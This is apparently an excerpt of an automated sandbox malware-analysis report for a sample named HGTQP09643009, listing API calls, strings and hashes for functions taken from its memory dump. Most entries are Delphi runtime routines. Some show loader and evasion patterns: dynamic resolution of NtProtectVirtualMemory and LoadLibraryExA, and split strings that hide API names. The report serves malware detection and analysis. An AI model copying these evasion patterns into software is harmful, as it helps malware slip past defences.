GetModuleHandleA.KERNEL32(kernel32.dll), ref: 029058D1
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 029058E8
lstrcpyn.KERNEL32(?,?,?), ref: 02905918
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 0290597C
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 029059B2
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 029059C5
FindClose.KERNEL32(000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 029059D7
lstrlen.KERNEL32(?,000000FF,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 029059E3
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 02905A17
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 02905A23
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 02905A45

Strings

kernel32.dll, xrefs: 029058CC
\, xrefs: 029059F5
GetLongPathNameA, xrefs: 029058DF

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
Instruction ID: 21ea11e3a9ba8686979c2074f08458f0ed82b6e8e51211b2f8388ca496123e9c
Opcode Fuzzy Hash: cd67ced5a8eb66b4f8a327f001917642bb420d918b351dbbe0e955014fc9388e
Instruction Fuzzy Hash: 6D415972D0025DAFDF10DAE8CCC8ADEB3AEBF88340F4545A5A548E7281E7709E848F50

Function 029179B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22librarynativeloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029179C5
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029179CB
NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 029179E9

Strings

NtProtectVirtualMemory, xrefs: 029179BB
C:\Windows\System32\ntdll.dll, xrefs: 029179C0

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleMemoryModuleProcProtectVirtual
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1550029230-1386159242
Opcode ID: 3e4a611d7211fed2fac4228ac5d63660f58e5eda3b7b663d4b9ad61c48be0fcb
Instruction ID: c586b9e19b9f431dfa1c7c7386342cecc334f82c7e0d63846a811ccdc3b71ac9
Opcode Fuzzy Hash: 3e4a611d7211fed2fac4228ac5d63660f58e5eda3b7b663d4b9ad61c48be0fcb
Instruction Fuzzy Hash: 3FE0B6B6A8020DAF9B40EFD9E885DDB77ECAB5C3807004805BA19D7240C734E9219FB0

Function 0291C6D2 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
NtClose.NTDLL(?), ref: 0291C783

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 5481fe5d920a3503657b805e125c66fc26c90133e02882083dd3b5e42ff351e8
Instruction ID: 32b12fb14fb4d73f7eac41ad50adf8c8259b93af3a146ab0b999575a39871558
Opcode Fuzzy Hash: 5481fe5d920a3503657b805e125c66fc26c90133e02882083dd3b5e42ff351e8
Instruction Fuzzy Hash: 7921BE71A8030DBEEB11EAE5CC82FEEB7BD9F44B00F505562B604F61C0D7B4AE058A55

Function 0291C6D4 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C713
NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 0291C74D
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C77A
NtClose.NTDLL(?), ref: 0291C783

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 8ca72002a824c80872189d1af99fdc06f6f7301b5a7bfa9bede1dcd48a4ecbdf
Instruction ID: 363738a11a034c8639d6e5f810bef75bba1993bf25b8bab774c7ba62390ebd50
Opcode Fuzzy Hash: 8ca72002a824c80872189d1af99fdc06f6f7301b5a7bfa9bede1dcd48a4ecbdf
Instruction Fuzzy Hash: 8721C071A8030DBEEB11EAD5CC82FDEB7BD9F44B00F505562B604F71C0D7B4AA058A55

Function 02907F4A Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02907F6D

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: dac0873e2f3e157ecf30ba3f5d911e29ce506fd64723b3ce0cb9852a3f4ef5e0
Instruction ID: 5607cb9a49eeaf2bdfa949f5bdb9aabbabdb3e3872d1442d3c467ba67c53440c
Opcode Fuzzy Hash: dac0873e2f3e157ecf30ba3f5d911e29ce506fd64723b3ce0cb9852a3f4ef5e0
Instruction Fuzzy Hash: 981100B5A00209AF9B04CF99C8809AFF7F9FFC8304B14C569A509EB254E6319A01CBA0

Function 0290A73C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 25d06dcc3a8a2b3df01f6200e1cf3979e7b2ab7fc5636c56a67a6884020739db
Instruction ID: f43b3bfa3688737b0026599daec17d86981229e1e3d4e34d1a0ad59838153a2f
Opcode Fuzzy Hash: 25d06dcc3a8a2b3df01f6200e1cf3979e7b2ab7fc5636c56a67a6884020739db
Instruction Fuzzy Hash: 21E09235B0021C1AD711A9985CC0AEAB29D9798350F00416AAA04C73C0EEA0AD804AE4

Function 0290B704 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 0290B712

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: a6b64114cd969191f3c808e8b3db40db99efaacbefbc36c0af7aee1f84f4d6ae
Instruction ID: dfa1f4cf206f3f2dfbd06017c34ae7445f39d1229c52db54a6783ae3f09fa3e0
Opcode Fuzzy Hash: a6b64114cd969191f3c808e8b3db40db99efaacbefbc36c0af7aee1f84f4d6ae
Instruction Fuzzy Hash: 4DF03A75D483018FC360DF28D4A0A2977FAFB88B00F014D28E498C7380E73894298F16

Function 0290A788 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0290BDEA,00000000,0290C003,?,?,00000000,00000000), ref: 0290A79B

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
Instruction ID: 607ab4dfbc471601296cf018d1975ad13636c506555ff2f350acc7b43ed1e352
Opcode Fuzzy Hash: c30ab9afcc803be26c380c181a15d2dc83cb02ae3c0e93a310babb5a72a7d01f
Instruction Fuzzy Hash: 96D05E6631D2643EA310519A2DD4DBBAAECCAC57A1F00843AF648C6180D2008C0697B1

Function 02909184 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02909188

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 55d25a43ec22de918725fd133b871e080edd18120f93c639a8c296fbe121a14f
Instruction ID: a21ab4b1eee21e22d349679a0736312d1c372acfe7a2360d9dfb955818109d7a
Opcode Fuzzy Hash: 55d25a43ec22de918725fd133b871e080edd18120f93c639a8c296fbe121a14f
Instruction Fuzzy Hash: 46A0120040582009814033180C0213C30485841720FC80B4468F8552D0EA1D013041D3

Function 029020C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 029473AD Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002947000.00000040.00001000.00020000.00000000.sdmp, Offset: 02947000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2947000_HGTQP09643009.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction ID: f7269753c4f8ce8fb03626b1720095287e8651704675cf503041d80ebf566234
Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction Fuzzy Hash: 7CF01232294259DFD761CE99E8C0FD9F3ACEB4067DF690869D94097151DB20E844C650

Function 0290D20C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0290D215

Part of subcall function 0290D1E0: GetProcAddress.KERNEL32(00000000), ref: 0290D1F9

Strings

VarDiv, xrefs: 0290D2A7
VarR8FromStr, xrefs: 0290D36D
VarDateFromStr, xrefs: 0290D383
VarCmp, xrefs: 0290D32B
VarCyFromStr, xrefs: 0290D399
VarBstrFromCy, xrefs: 0290D3C5
VarMod, xrefs: 0290D2D3
VarAdd, xrefs: 0290D265
VarNot, xrefs: 0290D24F
VarBstrFromBool, xrefs: 0290D3F1
VarIdiv, xrefs: 0290D2BD
VarMul, xrefs: 0290D291
VarBstrFromDate, xrefs: 0290D3DB
VarOr, xrefs: 0290D2FF
VarNeg, xrefs: 0290D239
VarXor, xrefs: 0290D315
VarR4FromStr, xrefs: 0290D357
VariantChangeTypeEx, xrefs: 0290D223
VarSub, xrefs: 0290D27B
VarBoolFromStr, xrefs: 0290D3AF
oleaut32.dll, xrefs: 0290D210
VarAnd, xrefs: 0290D2E9
VarI4FromStr, xrefs: 0290D341

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 273d6894efcd6e2434be17a98c31c5a79a32ecb8d8fafd83d6cd1f33a0797929
Instruction ID: 372493c25a5b01d3d910f29407324c0c2737031960660f26aff34bf14468aefd
Opcode Fuzzy Hash: 273d6894efcd6e2434be17a98c31c5a79a32ecb8d8fafd83d6cd1f33a0797929
Instruction Fuzzy Hash: 9F416265A4830CDF5648ABED74C142B7BEAEACC7503A0451BF408CBBC5DE60BD518BB9

Function 0291A374 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A394
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0291A3AB
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0291A3B1
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0291A3C3
IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 0291A43F
IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 0291A44B
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 0291A45F

Strings

LoadLibraryExA, xrefs: 0291A3A1
C:\Windows\System32\KernelBase.dll, xrefs: 0291A3A6

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: HugeRead$AddressHandleLibraryLoadModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 2109905598-1650066521
Opcode ID: bdd4d9b6ac58171e40c6332818e461e1d74a44c82de6a72f83bb279c6d152f7b
Instruction ID: 9ecef51b46eec369c2676320897a9bcf14c93f36d14d02ece2718b158d0e8a93
Opcode Fuzzy Hash: bdd4d9b6ac58171e40c6332818e461e1d74a44c82de6a72f83bb279c6d152f7b
Instruction Fuzzy Hash: 02314271A4130DBFDB20DBA6CC8AF6A77ACAF45325F004554EA18DB2C1D370AD50CBA4

Function 02902530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029028CE

Strings

bytes: , xrefs: 0290275D
An unexpected memory leak has occurred. , xrefs: 02902690
The unexpected small block leaks are:, xrefs: 02902707
7, xrefs: 029026A1
String, xrefs: 029027A1
, xrefs: 02902814
Unexpected Memory Leak, xrefs: 029028C0
Unknown, xrefs: 0290278C
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02902849

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 47c834b36d6720c7655fdfae86e3368dabed165f207fadc95d3758e4bb607eb4
Instruction ID: 923d5cb4fffafbe79c87d04e0d6fadfecedec752d0aa8455147155dec5da8d1b
Opcode Fuzzy Hash: 47c834b36d6720c7655fdfae86e3368dabed165f207fadc95d3758e4bb607eb4
Instruction Fuzzy Hash: 81A1AE30E0436C8FDB21AB2CCCC8B99B6E9EB49750F1440E5ED49AB2C6CB759985CB51

Function 0290252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

bytes: , xrefs: 0290275D
An unexpected memory leak has occurred. , xrefs: 02902690
The unexpected small block leaks are:, xrefs: 02902707
7, xrefs: 029026A1
, xrefs: 02902814
Unexpected Memory Leak, xrefs: 029028C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02902849

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 0b97dfe6cc09a10a2867fd445523771a034eec209098934586b5b256cc679ae2
Instruction ID: 8f10cbe5fe78a3922926f824245ac42586bbd23df260fa9b034e1d126e140513
Opcode Fuzzy Hash: 0b97dfe6cc09a10a2867fd445523771a034eec209098934586b5b256cc679ae2
Instruction Fuzzy Hash: CC71A030E042AC8FDF219B2CCCC8B99BAE9EB49704F1041E5D949AB2C1DB759AC5CF51

Function 0290BD38 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0290C003,?,?,00000000,00000000), ref: 0290BD6E

Part of subcall function 0290A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0290A75A

Strings

m/d/yy, xrefs: 0290BE3D
:mm, xrefs: 0290BFA1
AMPM, xrefs: 0290BF82
:mm:ss, xrefs: 0290BFBE
mmmm d, yyyy, xrefs: 0290BE6A
AMPM , xrefs: 0290BF91

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 14a652e7a4f1e4567987caad0792318ae202c2a5f38426d2ecef11d6f21b462d
Instruction ID: 9d1fcec36e2e9c225fd1cf16021627f8fe5422ca1fd2c9808e1cb9f35a270d75
Opcode Fuzzy Hash: 14a652e7a4f1e4567987caad0792318ae202c2a5f38426d2ecef11d6f21b462d
Instruction Fuzzy Hash: EC611F35F0024C9FDB01EBA4D8D0A9E77FB9FC9300F519535A601AB3C5DA35EA0A9B91

Function 0290432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,?,?,?,?,?,0290449E,02902CF3), ref: 02904365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3,?,?,?,?,?,?,?,0290449E), ref: 0290436B
GetStdHandle.KERNEL32(000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3), ref: 02904380
WriteFile.KERNEL32(00000000,000000F5,029043B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029043F3), ref: 02904386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029043A4

Strings

Error, xrefs: 02904398
Runtime error at 00000000, xrefs: 0290435E, 0290439D

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 58679b1aa2a07a99c998d04d8a3b2d6da033fbd0c0277e8cc2adb58a0d92e89a
Instruction ID: 87ce2c2a622378c135edbb525558225c8470b59e11a3d1f9a729df2595a788dd
Opcode Fuzzy Hash: 58679b1aa2a07a99c998d04d8a3b2d6da033fbd0c0277e8cc2adb58a0d92e89a
Instruction Fuzzy Hash: 9EF0B462EC834C7DFA50A6A0ADC6F6A376D57C9F20F101A06B724B40C5C7A494C88B26

Function 02917B3C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,00000000,02917C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02917BBE
GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02917BC4
GetCurrentProcess.KERNELBASE ref: 02917BCE

Strings

GetCurre, xrefs: 02917B55
oces, xrefs: 02917B8F
KernelBase, xrefs: 02917BB9

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: GetCurre$KernelBase$oces
API String ID: 4190356694-953896676
Opcode ID: 9d743ca76663fe242d536ab31b0ced10473d0d60a5ad1fc27a0a318a71f87f39
Instruction ID: 307fbd37ab189163f10c19d3e10651bbdea19acd8da644169bf84170f795c91c
Opcode Fuzzy Hash: 9d743ca76663fe242d536ab31b0ced10473d0d60a5ad1fc27a0a318a71f87f39
Instruction Fuzzy Hash: 73F0A430BC430D7FF611ABE2DD82FAAF7AED7C4F00F610860B501A26C0D77469104925

Function 0290AE3C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0290ACB4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0290ACD1
Part of subcall function 0290ACB4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0290ACF5
Part of subcall function 0290ACB4: GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 0290AD10
Part of subcall function 0290ACB4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0290ADA6

CharToOemA.USER32(?,?), ref: 0290AE73
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0290AE90
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AE96
GetStdHandle.KERNEL32(000000F4,0290AF00,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEAB
WriteFile.KERNEL32(00000000,000000F4,0290AF00,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0290AEB1
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0290AED3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 0290AEE9

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 3c70135fd18192795852a92cfc1f4ab0bf0af6aa24ff6a45b430aa3bac3382c3
Instruction ID: b768cd3e4e8f7ed83493fa964570ed799ca103c3dd97dad9155488ef0b37dc75
Opcode Fuzzy Hash: 3c70135fd18192795852a92cfc1f4ab0bf0af6aa24ff6a45b430aa3bac3382c3
Instruction Fuzzy Hash: E0111CB2548308AED200E794CCC5F9B77AEAF84700F40092AB754D71D1DB70E9548B66

Function 0290E504 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0290E59D
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0290E5B9
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0290E5F2
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0290E66F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0290E688
VariantCopy.OLEAUT32(?,00000000), ref: 0290E6BD

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: d122af429cfe151169050e9ae185d03825c6aa5e81980c6c6bd94b0867dbd7de
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: C651FBB590062D9FDB26EB98C8C0BD9B3BDAF8D300F0445D5E549A7281D670AF848F60

Function 02903568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0290358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035BD
RegCloseKey.ADVAPI32(?,029035E0,00000000,?,00000004,00000000,029035D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029035D3

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02903580
FPUMaskValue, xrefs: 029035B4

Memory Dump Source

Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true

Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd

Similarity

